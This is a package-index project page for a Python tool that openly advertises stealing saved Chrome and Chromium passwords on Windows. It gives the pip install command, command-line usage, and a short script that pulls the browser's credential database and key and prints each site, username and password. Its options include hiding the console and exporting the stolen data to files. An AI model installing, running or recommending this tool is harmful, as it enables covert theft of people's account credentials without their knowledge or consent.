Skip to main content

This module steals chrome and chromium passwords on Windows

Project description

ChromePasswordsStealer logo

ChromePasswordsStealer

Description

This module steals chrome and chromium passwords on Windows.

Requirements

This package require:

  • python3
  • python3 Standard Library
  • pywin32
  • PythonToolsKit
  • PyCryptodome

Installation

pip install ChromePasswordsStealer

Usages

Command lines

# Python executable
python3 ChromePasswordsStealer.pyz -h
# or
chmod u+x ChromePasswordsStealer.pyz
./ChromePasswordsStealer.pyz --help

# Python module
python3 -m ChromePasswordsStealer

# Entry point (console)
ChromeStealer --save-all --window -f passwords

Python script

from ChromePasswordsStealer import ChromePasswordsStealer
stealer = ChromePasswordsStealer()
stealer = ChromiumPasswordsStealer("passwords", True)
stealer.get_database_cursor()
stealer.get_key()
for url, username, password in stealer.get_credentials():
    print(url, username, password)

stealer.save_and_clean()

Help

~# python3 ChromePasswordsStealer.py -h

usage: ChromePasswordsStealer.py [-h] [--filename FILENAME] [--window] [--save-all]

This program steals Chrome passwords on Windows.

optional arguments:
  -h, --help            show this help message and exit
  --filename FILENAME, -f FILENAME
                        The filename to export the credentials.
  --window, -w          Do not hide the console.
  --save-all, -s        Save chrome db, key file and key.

Links

Licence

Licensed under the GPL, version 3.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

ChromePasswordsStealer-1.0.2.tar.gz (20.4 kB view hashes)

Uploaded Source

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page